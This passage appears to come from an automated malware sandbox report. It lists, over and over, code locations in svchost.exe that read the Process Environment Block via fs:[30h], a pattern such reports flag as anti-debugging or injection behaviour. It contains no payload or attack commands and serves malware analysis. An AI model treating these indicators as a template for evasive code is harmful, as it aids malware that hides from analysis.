            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
